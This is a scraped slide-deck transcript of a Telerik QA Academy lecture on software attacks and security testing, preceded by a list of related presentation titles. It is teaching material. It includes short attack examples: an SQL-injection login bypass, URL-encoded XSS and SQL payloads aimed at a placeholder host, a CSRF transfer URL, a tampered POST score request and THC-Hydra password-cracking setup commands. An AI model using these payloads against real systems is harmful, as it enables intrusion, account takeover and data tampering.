Software Attacks Lora Borisova QA Engineer WCATeam Anton Angelov QA Engineer Bysiness System Team Telerik QA Academy Telerik QA Academy.

Slides:



Advertisements
Similar presentations
Authenticating Users. Objectives Explain why authentication is a critical aspect of network security Explain why firewalls authenticate and how they identify.
Advertisements

WebGoat & WebScarab “What is computer security for $1000 Alex?”
1 Topic 1 – Lesson 3 Network Attacks Summary. 2 Questions ► Compare passive attacks and active attacks ► How do packet sniffers work? How to mitigate?
Telnet and FTP. Telnet Lets you use the resources of some other computer on the Internet to access files, run programs, etc. Creates interactive connection.
Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
Security Issues and Challenges in Cloud Computing
19.1 Silberschatz, Galvin and Gagne ©2003 Operating System Concepts with Java Chapter 19: Security The Security Problem Authentication Program Threats.
Client/Server Computing Model of computing in which very powerful personal computers (clients) are connected in a network with one or more server computers.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Sanjay Goel, School of Business/Center for Information Forensics and Assurance University at Albany Proprietary Information 1 Unit Outline Information.
Silberschatz, Galvin and Gagne  Operating System Concepts Module 19: Security The Security Problem Authentication Program Threats System Threats.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Web server security Dr Jim Briggs WEBP security1.
FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. 10 Authenticating Users By Whitman, Mattord, & Austin© 2008 Course Technology.
Lesson 9-Securing a Network. Overview Identifying threats to the network security. Planning a secure network.
Assessing the Threat How much money is lost due to cyber crimes? –Estimates range from $100 million to $100s billions –Why the discrepancy? Companies don’t.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.
11 SECURING INTERNET MESSAGING Chapter 9. Chapter 9: SECURING INTERNET MESSAGING2 CHAPTER OBJECTIVES  Explain basic concepts of Internet messaging. 
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Security.NET Chapter 1. How Do Attacks Occur? Stages of attack Examples of attacker actions 1. FootprintRuns a port scan on the firewall 2. PenetrationExploits.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
1-Vulnerabilities 2-Hackers 3-Categories of attacks 4-What a malicious hacker do? 5-Security mechanisms 6-HTTP Web Servers 7-Web applications attacks.
A Security Review Process for Existing Software Applications
CIS 450 – Network Security Chapter 8 – Password Security.
Configuring Electronic Health Records Privacy and Security in the US Lecture f This material (Comp11_Unit7f) was developed by Oregon Health & Science University,
Software Security Testing Vinay Srinivasan cell:
OSI and TCP/IP Models And Some Vulnerabilities AfNOG th May 2011 – 10 th June 2011 Tanzania By Marcus K. G. Adomey.
Types of Electronic Infection
Web Application Security ECE ECE Internetwork Security What is a Web Application? An application generally comprised of a collection of scripts.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Lecture 20 Hacking. Over the Internet Over LAN Locally Offline Theft Deception Modes of Hacker Attack.
Chapter 1 Overview The NIST Computer Security Handbook defines the term Computer Security as:
Network Security. 2 SECURITY REQUIREMENTS Privacy (Confidentiality) Data only be accessible by authorized parties Authenticity A host or service be able.
SEC835 Runtime authentication Secure session management Secure use of cryptomaterials.
APPLICATION PENETRATION TESTING Author: Herbert H. Thompson Presentation by: Nancy Cohen.
CIS 450 – Network Security Chapter 4 - Spoofing. Definition - To fool. In networking, the term is used to describe a variety of ways in which hardware.
Web Applications Testing By Jamie Rougvie Supported by.
By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.
Web Security SQL Injection, XSS, CSRF, Parameter Tampering, DoS Attacks, Session Hijacking SoftUni Team Technical Trainers Software University
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 1 “Overview”. © 2016 Pearson.
COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.
Chapter 12: How Private are Web Interactions?. Why we care? How much of your personal info was released to the Internet each time you view a Web page?
Database Security Cmpe 226 Fall 2015 By Akanksha Jain Jerry Mengyuan Zheng.
Firewalls A brief introduction to firewalls. What does a Firewall do? Firewalls are essential tools in managing and controlling network traffic Firewalls.
Role Of Network IDS in Network Perimeter Defense.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
Unit 2 Personal Cyber Security and Social Engineering Part 2.
By Collin Donaldson Man in the Middle Attack: Password Sniffing and Cracking.
Firewalls. Overview of Firewalls As the name implies, a firewall acts to provide secured access between two networks A firewall may be implemented as.
SAMET KARTAL No one wants to share own information with unknown person. Sometimes while sharing something with someone people wants to keep.
SESSION HIJACKING It is a method of taking over a secure/unsecure Web user session by secretly obtaining the session ID and masquerading as an authorized.
Lecture 1 Introduction Dr. nermin hamza 1. Aim of Course Overview Cryptography Symmetric and Asymmetric Key management Researches topics 2.
Lecture 19 Page 1 CS 236 Online 6. Application Software Security Why it’s important: –Security flaws in applications are increasingly the attacker’s entry.
Chapter 40 Internet Security.
CS457 Introduction to Information Security Systems
Chapter 7: Identifying Advanced Attacks
USAGE OF CRYPTOGRAPHY IN NETWORK SECURITY
Secure Software Confidentiality Integrity Data Security Authentication
A Security Review Process for Existing Software Applications
Year 10 ICT ECDL/ICDL IT Security.
Security in Networking
Lecture 2 - SQL Injection
Security.
Operating System Concepts
6. Application Software Security
Presentation transcript:

Software Attacks Lora Borisova QA Engineer WCATeam Anton Angelov QA Engineer Bysiness System Team Telerik QA Academy Telerik QA Academy

 Security Vulnerability Testing – Main Concepts  Characteristics of a Secure Software  Threat Modeling  Methods of Security Testing  Popular Software Attacks  Cryptography 2

Main Concepts

 What is security testing?  Directed and focused form of testing that attempts to force specific failures to occur  Focused especially on reliability 4

 Where do bugs come from?  Bugs arise from interactions between the software and its environment during operation  What is the software's operating environment?  The human user  The file system  The operating system  Other cohabitating and interoperating software 5

 Where do bugs come from?  Bugs arise from the software's capabilities  Accepting inputs  Producing outputs  Storing data  Performing computations 6

 Is Software Security a Feature?  Most people consider software security as a necessary feature of a product  Is Security Vulnerability a Bug?  If the software "failed" and allowed a hacker to see personal info, most users would consider that a software bug 7

 Vulnerabilities typically fall into two categories  Bugs at the implementation level  Bugs tend to be easier for attackers to exploit  Flaws at the design level  The hardest defect category to handle  Also the most prevalent and critical 8

 Intended vs. implemented software behavior in applications 9

 In the real world, software failures usually happen spontaneously  Without intentional mischief  Failures can be result of malicious attacks  For the Challenge/Prestige  Curiosity driven  Aiming to use resources  Vandalizing  Stealing 10

 Software security testing includes:  Creating security abuse/misuse cases  Listing normative security requirements  Performing architectural risk analysis  Building risk-based security test plans  Wielding static analysis tools  Performing security tests  Performing penetration testing in the final environment  Cleaning up after security breaches 11

 Software Development Life Cycle, With Security In Mind 12 Requirements and use cases Design Test plans Code Test results Field feedback Abusecases Security requirements Security breaks External review Risk-based security tests Static analysis (tools) Riskanalysis Riskanalysis Penetration testing

 Make your applications as simple as possible  The more complicated you make a software – the greater the chance for mistakes  The greater the chance for a security breakthrough 13

 Confidentiality  Disclosure of information to only intended parties  Integrity  Determine whether the information is correct or not  Data Security  Privacy  Data Protection  Controlled Access 15

 Authentication  Access to Authorized People  Availability  Ready for Use when expected  Non Repudiation  Information Exchange with proof 16

 Ever have anyone ask you this?  There’s an easy answer: NO  There are no “Secure” apps  But there are apps that are secure enough  How to achieve enough security?

 Nobody has an infinite security budget  Many folks would be happy if they had any budget  Be practical!  Get the most bang for your buck

 Threat modeling  A process for evaluating a software system for security issues  Can be considered as a variation of formal reviews  The review team looks for areas of the product's feature set that are susceptible to security vulnerabilities 20

 Threat modeling helps you find what is “secure enough”  What are you trying to protect?  Who is likely to attack you?  What avenues of attack exist?  Which vulnerabilities are the highest risk?  Go after the high risk vulnerabilities first!

 Don’t have a security expert?  Use Microsoft Patterns & Practices  Threat Modeling Web Applications  us/library/ms aspx us/library/ms aspx us/library/ms aspx  Security guidance put together by well-known experts

 Threat modeling follows a few steps:  Assemble the threat modeling team  Identify the assets  Create an architecture overview  Decompose the application  Identify the threats  Document the threats  Rank the threats 23

 Threats are not equally important  A way to rank the threats is the DREAD formula – using these criteria:  Damage potential  Reproducibility  Exploitability  Affected Users  Discoverability 24

 Hackers attack where the weakest link is  Find the weakest security link of your application and secure it as best as possible  After you harden the weakest link, another one becomes the weakest one 25

 OS Hardening  Configure and Apply Patches  Updating the Operating System  Disable or Restrict unwanted Services and Ports  Lock Down the Ports  Manage the Log Files  Install Root Certificate  Protect from Internet Misuse and be Cyber Safe  Protect from Malware 27

 Vulnerability Scanning  Identify Known Vulnerabilities  Scan Intrusively for Unknown Vulnerabilities  Port Scanning and Service Mapping  Identification and locating of Open Ports  Identification of Running Services 28

 Penetration Testing  Simulating Attack from a Malicious Source  Includes Network Scanning and Vulnerability Scanning  Simulates Attack from someone Unfamiliar with the System  Simulates Attack by having access to Source Code, Network, Passwords 29

 Firewall Rule Testing  Identify Inappropriate or Conflicting Rules  Appropriate Placement of Vulnerable Systems behind Firewall  Discovering Administrative Backdoors or Tunnels  SQL Injection  Exploits Database Layer Security Vulnerability  Unexpected Execution of User Inputs 30

 Cross Site Scripting  Injecting Malicious Client Side Script into Web Pages  Persistent, Non-Persistent and DOM based Vulnerabilities  Parameter Manipulation  Cookie Manipulation  Form Field Manipulation  URL Manipulation  HTTP Header Manipulation 31

 Denial of Service Testing  Flooding a target machine with enough traffic to make it incapable  Command Injection  Inject and execute commands specified by the attacker  Execute System level commands through a Vulnerable Application 32

 Network Scanning  Identifying Active Hosts on a network  Collecting IP addresses that can be accessed over the Internet  Collecting OS Details, System Architecture and Running Services  Collecting Network User and Group names  Collecting Routing Tables and SNMP data 33

 Password Cracking  Collecting Passwords from the Stored or Transmitted Data  Using Brute Force and Dictionary Attacks  Identifying Weak Passwords  Ethical Hacking  Penetration Testing, Intrusion Testing and Red Teaming 34

 File Integrity Testing  Verifying File Integrity against corruption using Checksum  Format String Testing  Supplying Format type specifiers in the Application input 35

 War Dialing  Using a Modem to dial a list of Telephone Numbers  Searching for Computers, Bulletin Board System and Fax Machines  Wireless LAN Testing  Searching for existing WLAN and logging Wireless Access Points 36

 Buffer Overflow Testing  Overwriting of Memory fragments of the Process, Buffers of Char type  Random Data Testing  Random Data Inputs by a Program  Encoded Random Data included as Parameters  Crashing built-in code Assertions 37

 Random Mutation Testing  Bit Flipping of known Legitimate Data  Byte stream Sliding within known Legitimate Data  Session Hijacking  Exploitation of Valid Computer Session  Exploitation of the Web Session control mechanism  Gain unauthorized access to the Web Server 38

 Phishing  Masquerading as a trustworthy entity in an electronic communication  Acquiring usernames, passwords and credit card details  URL Manipulation  Make a web server deliver inaccessible web pages  URL Rewriting 39

 IP Spoofing  Creating Internet Protocol (IP) packets with a forged source IP address  Packet Sniffing  Capture and Analyze all of the Network traffic 40

 Virtual Private Network Testing  Penetration Testing  Social Engineering  Psychological Manipulation of People  Divulging confidential information 41

 SANS (System Administration, Networking, and Security) Institute  Established in 1989 as a cooperative research and education organization  Enables more than 165,000 security professionals, auditors, system administrators, and network administrators to share the lessons they are learning and find solutions to the challenges they face  See for more information 44

 SQL injection  OS command injection  Cross-Site Scripting (XSS)  Cross-Site Request Forgery (CSRF)  Unrestricted upload of dangerous file  URL redirection to untrusted site (Open Redirect)  Buffer overflow  Improper limitation of a pathname 45

 Download of a code without integrity check  Uncontrolled format string  Missing or incorrect authorization  Use of hard-coded credentials  Missing encryption of sensitive data  Execution of unnecessary privileges  Improper restriction of excessive authentication attempts 46

 What is SQL injection?  A code injection technique  Malicious code is inserted into strings  Later passed to an instance of SQL Server for parsing and execution 47

 Original SQL Query: String sqlQuery = "SELECT * FROM user WHERE name = '" + username +"' AND pass='" + password + "'“ 48  Setting username to John & password to ' OR '1'= '1 produces String sqlQuery = SELECT * FROM user WHERE name = 'John' AND pass='' OR '1'='1'  The result:  If a user John exists – he is logged in without password

49

 Use Prepared Statements  Validate all of the user information  Remove special characters from the user input  Never show SQL error messages to the user  Use different field names for user interface and database  Disable all unused features of the database  Limit user permissions for the database 50

51  An OS command injection attack occurs when an attacker attempts to execute system level commands through a vulnerable application.

52  The application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user  The application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user However, commands are executed with the same privileges and environment as the application has

DEMO

 Do you really need a method or a class to be public?  If not – make it private or protected 54

 What is XSS?  A type of computer security vulnerability  Allows injecting client-side script into web pages viewed by other users 55

 What is XSS?  The malicious code along with the original webpage gets displayed in the web client  Allows hackers to gain greater access of that page 56

 Stealing other user’s cookies  Stealing their private information  Performing actions on behalf of other users  Redirecting to other websites  Showing ads in hidden IFRAMES and pop-ups  Showing ads in hidden IFRAMES and pop-ups 57

 Validate all input data from the user  Never show data entered by the user without cleaning them from JavaScript and HTML  If showing HTML and JavaScript from the user is needed – use the tag  The browser will ignore entered code 58

 Consider each user input as incorrect until proven correct  Never accept user input without complete validation 60

 Acunetix WVS ( checks your web applications for XSS, SQL Injection & other vulnerabilities  Free demo version with limited functionality available (XSS checks only) 61

 What is buffer overflow?  An anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory  Also called buffer overrun 63

 Buffer overflow is commonly associated with C and C++  Provide no built-in protection against accessing or overwriting data 64

 Choice of programming language  Use of safe libraries  Buffer overflow protection  Pointer protection  Executable space protection   Address space layout randomization   Deep packet inspection 65

 What is Wireshark?  Free and open-source packet analyzer  Used for:  Network troubleshooting  Analysis  Software and communications protocol development  Source:

Demo

 What is a password attack?  A type of software attack in which the attacker tries to guess passwords or crack encrypted password files  Either manually or through the use of scripts 70

 Simple guessing  Dictionary attacks  Using a list of popular passwords  Password phishing  Masquerading as a trustworthy entity  Brute force attacks  Generating all possible combinations 71

72

 9.8% have the passwords password, or ;  14% have a password from the top 10 passwords  40% have a password from the top 100 passwords  79% have a password from the top 500 passwords  91% have a password from the top passwords  98.8% have a password from the top passwords 73

 What is THC-Hydra?  A very fast network logon cracker which support many different services.  Free of charge for non-enterprise use  Source:

Currently this tool supports:  POP3  FTP  HTTP-GET, HTTP-FORM-POST, HTTPS-GET…  Firebird  Subversion (SVN)  Telnet  And many more… 76

 What type of attacks can HYDRA-HTC do?  Parallel dictionary attacks (16 threads by default)  Brute force/Hybrid attacks  Check for null, reversed, same as username passwords  Slow down the process of attack- prevent detection- IPS (Intrusion Prevention System)  Parallel attack of different servers 77

 Download and install CYGWIN – Linux-like environment for Windows  Go to the directory of hydra:  CYGWIN cd C:\hydra-7.3  CYGWIN  cd C:\hydra-7.3  Type "./configure", then "make" and finally "make install"  For help type: hydra  For help for module: hydra –U "module-name"  Example: hydra –U http-form-post 78

DEMO

 Choosing good passwords: 1. Start with a Base Word Phrase cstfttt 2. Lengthen the Phrase cstftttGmail 3. Scramble the Phrase 4. Lastly: Rotate/Change Your Password Regularly hbd(Gmail  Use Strong Password Generator: FlyingBit FlyingBit 80

 What is Denial of Service attack?  An attempt to make a computer resource unavailable to its intended users  Sending messages which exhaust service provider’s resources  Network bandwidth, system resources, application resources 81

 DDoS attacks  Employing multiple (dozens to millions) compromised computers to perform a coordinated and widely distributed DoS attack 82

 Limit ability of systems to send spoofed packets  Rate controls in upstream distribution nets  Use modified TCP connection handling  Block IP broadcasts  Block suspicious services & combinations 83

 Manage application attacks with “puzzles” to distinguish legitimate human requests  Good general system security practices  Use mirrored and replicated servers when high performance and reliability required 84

 An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation.  Real redirect: // // //  Faked link: /../../../redirect.asp%3F%3Dhttp%3 A// assword_recovery_system /../../../redirect.asp%3F%3Dhttp%3 A// assword_recovery_system /../../../redirect.asp%3F%3Dhttp%3 A// assword_recovery_system 85

 Imagine a user receives an invitation to view his profile at:  Accidentally he omits the final "9" and opens:  As a result – he opens someone else's profile  Gaining access to someone's personal information 86

 Why would someone manipulate URL?  Getting a web server to deliver web pages he is not supposed to have access to  Trigering an exception thus revealing information in an error message 87

 Example:  Removing any site from Google  Even when you don’t control it!  Exploit in Google Webmaster Tools  Fixed within 7 hours  Just open the following URL: request?hl=en&siteUrl= {YOUR_URL} /&urlt= {URL_TO_BLOCK} request?hl=en&siteUrl= {YOUR_URL} /&urlt= {URL_TO_BLOCK} 88

See: from-google-even-if-you-dont-control-it.html from-google-even-if-you-dont-control-it.html from-google-even-if-you-dont-control-it.html 89

 URL Attack as an XSS  %3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2f script%3e %3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2f script%3e %3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2f script%3e    URL Attack as an SQL Injection  ogintable%20set%20passwd%3d%270n3d%27%3b--%00 ogintable%20set%20passwd%3d%270n3d%27%3b--%00 ogintable%20set%20passwd%3d%270n3d%27%3b--%00 90

 A.k.a one-click attack or session riding and abbreviated as CSRF (pronounced sea-surf) or XSRF  Type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts  A vulnerable URL: &amount= &for=mallory &amount= &for=mallory &amount= &for=mallory  Secret cookies and accepting only POST requests does not help 91

 Follow the Principle of the "Weakest Privilege"  Give no user greater permissions than he needs for performing his job 92

 Error messages can reveal important information about your site  Error messages like that should not be allowed: 93

94 DEMO

 All applications throw errors every once in a while  Make sure that even in this case your application remains stable 95

 What is IP address spoofing?  Creation of Internet Protocol (IP) packets with a forged source IP address  What is the purpose?  Concealing the identity of the sender  Impersonating another computing system 96

 Packet filtering  Ingress filtering  Blocking of packets from outside the network with a source address inside the network  Egress filtering  Blocking of packets from inside the network with a source address that is not inside  Not relying on IP for authentication 97

 What is session hijacking?  Getting access to the session state of a particular user  Steals a valid session ID which is used to get into system and retrieve the data 98

 Spoofing  An attacker does not actively take another user offline to perform the attack  He mainly pretends to be another user or machine to gain access 99 I am John and here are my credentials

 Hijacking  An attacker takes over an existing session  He relies on the legitimate user to make a connection and authenticate 100 John logs on to the server with his credentials

 Hijacking  Subsequently, the attacker takes over the session 101

 Session fixation  Setting a user's session id to a predefined one  Session sidejacking  Using packet sniffing to read network traffic between two parties and steal the session cookie  Cross-site scripting  Obtain a copy of the cookie 102

 There are two main types of session hijacking:  Active  An attacker finds an active session and takes over  Passive  An attacker hijacks a session  Sits back, and watches and records all the traffic that is being sent forth 103

104 DEMO

 Use encryption  Use a secure protocol  Limit incoming connections  Minimize remote access  Educate the employees 105

 Check authentication data constantly  A user or an application might have once passed a security check  That does not mean they should be trusted blindly from that moment on 106

 What is social engineering?  The act of manipulating people into performing actions or revealing confidential information  Instead of breaking in or using technical hacking techniques  Essentially – a fancier, more technical way of lying 107

 "Dumpster Diving"  "Shoulder Surfing"  Malicious Attachments  Deception and Manipulation  "Phishing"  "Pharming"  Reverse Social Engineering  PBX Disguise 108

 Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication 109

 Pharming is a hacker's attack aiming to redirect a website's traffic to another, bogus website. 110

 "Dumpster Diving“, a.k.a. trashing or skipping, is the practice of sifting through commercial or residential trash to find items that have been discarded by their owners, but which may be useful to the dumpster diver 111

112

 Real story: Japan Earthquake scammers were spreading malicious links to “dramatic” videos of the disaster. So, you ended up clicking on a link that actually downloaded malware onto your PC or took you to a phishing site that asked for personal information 113

 These are direct observation techniques, such as looking over someone's shoulder, to get information. Shoulder surfing is particularly effective in crowded places because it is relatively easy to observe someone as they:  fill out a form  enter their PIN  enter their password  tell sensitive information over the phone 114

 Public Business Exchange – attacker manipulates company ID system to impersonate someone of authority 115 “Hello? Who is this? Tech support? Oh, I’m sorry. I’m trying to reach Terry Simpson at extension Can you transfer me, please? I’m in a hurry.” … “Hi Terry, this is Jim from Tech Support. You can verify my identity from the caller-ID. Yes, I need to reset your password…”

 A final, more advanced method of gaining illicit information is known as “reverse social engineering”. This is when the hacker creates a persona that appears to be in a position of authority so that employees will ask him for information, rather than the other way around  Includes three phases: sabotage, advertising, assisting 116

 Magstudio ( had created an online game for one of their customers – Petrol AD 118

 At the end of the game, the collected player’s points were submitted directly as a POST query, without any encryption  POST /path/script.cgi HTTP/1.0 From: User-Agent: HTTPTool/1.0 Content-Type: application/x-www-form- urlencoded Content-Length: 33 name=Peter&surname=Sabev&score=10  Changed to Content-Length: 36 name=Peter&surname=Sabev&score=

 What is Cryptography?  The practice and study of hiding information  It is considered as a branch of both Mathematics and Computer Science 120

 Cryptography has three main elements  Encryption: is the process of transforming information (referred to as plaintext) using an algorithm (called a cipher) to make it unreadable to anyone except those possessing special knowledge, usually referred to as a key  Decryption  Key  A value that works with a cryptographic algorithm to produce a specific cipher text 121

 Based on the type of key used, Cryptography is categorized into:  Symmetric key Cryptography  Asymmetric key Cryptography  Public-key cryptography  The biggest 128 -bit number: 340,282,366,920,938,463,463,374,607,431,768,211,455 which equals to − 1 122

123

124  Precomputed table for reversing cryptographic hash functions  Cracking password hashes  Recovering the plaintext password, up to a certain length consisting of a limited set of characters  Cryptohaze GPU Rainbow Cracker - r.php r.php r.php

125  Full Rainbow tables: Md 5 ( )- > fcea 920 f > Reduction(fcea 920 f 749 ) - > > Md 5 ( ) - > d 7 db 1 cf 7- > Reduction(d 7 db 1 cf 7 ) Md 5 ( )- > fcea 920 f > Reduction(fcea 920 f 749 ) - > > Md 5 ( ) - > d 7 db 1 cf 7- > Reduction(d 7 db 1 cf 7 )  Here is the algorithm: 1. Check to see if the hash matches any of the final hashes. If so, break out of the loop because you have found the chain that contains its plaintext. 2. If the hash doesn’t match any of the final hashes in the tables, use the reduction function on it to reduce it into another plaintext, and then hash the new plaintext. Go back to step 1.

126

Salt consists of random bits, creating one of the inputs to a hash function Salt consists of random bits, creating one of the inputs to a hash function 127

128 DEMO

129

Questions?